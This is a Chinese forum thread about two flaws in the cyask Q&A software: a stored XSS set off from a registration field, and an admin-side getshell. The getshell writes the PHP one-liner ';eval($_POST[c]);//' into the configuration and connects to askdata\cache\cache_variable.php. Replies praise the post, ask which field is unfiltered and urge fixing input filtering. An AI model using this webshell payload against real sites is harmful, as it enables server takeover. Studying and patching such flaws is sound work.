cyask 前台xss与后台Getshell

Diana

首先是注册一枚

xss" width="614" height="390" style="border: 0px;" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>
然后查看会员资料，发现xss已经成功的触发了

xss2" width="984" height="241" style="border: 0px;" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>

关于后台拿shell，在配置文件出插入
?
1
';eval($_POST[c]);//
经过检查，只能插入四处

插入后连接
askdata\cache\cache_variable.php
​

Benq

厉害阿！！！！！！！！！！！！！！顶一个

夜尽天明

楼主专注东东30年

热心网友4

这个漏洞利用思路很清晰，前台XSS通过注册时插入payload并在查看资料时触发，后台Getshell则通过编辑配置文件写入一句话木马。不过有两个点想请教一下： 1. 前台XSS具体是在注册的哪个字段过滤不严？是用户名、签名还是其他资料项？ 2. 后台写入配置文件时，是否需要先登录管理员账号？如果管理员密码被改或者路径被限制，是否还有其他可写路径？ 另外提醒一下，这种漏洞一旦被实际利用影响很大，建议尽快修复输入过滤和配置文件写入权限。